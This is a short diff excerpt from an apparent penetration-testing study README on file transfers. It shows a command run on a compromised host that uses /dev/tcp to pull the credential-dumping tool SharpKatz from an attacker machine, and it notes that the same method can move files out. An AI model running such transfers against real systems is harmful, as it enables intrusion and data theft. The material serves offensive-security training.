ma7moudShaaban/Penetration-Testing/Network/File Transfers/README.md

 > # Compromised Machine Connecting to Netcat Using /dev/tcp to Receive the File
 > victim@target:~$ cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe
 > ```
-> Note: The same operation can be used to transfer files from the compromised host to our Pwnbox.
+> [!NOTE] The same operation can be used to transfer files from the compromised host to our Pwnbox.

 ### PowerShell Session File Transfer
 - We already talk about doing file transfers with PowerShell, but there may be scenarios where HTTP, HTTPS, or SMB are unavailable.
 If that's the case, we can use PowerShell Remoting, aka WinRM, to perform file transfer operations.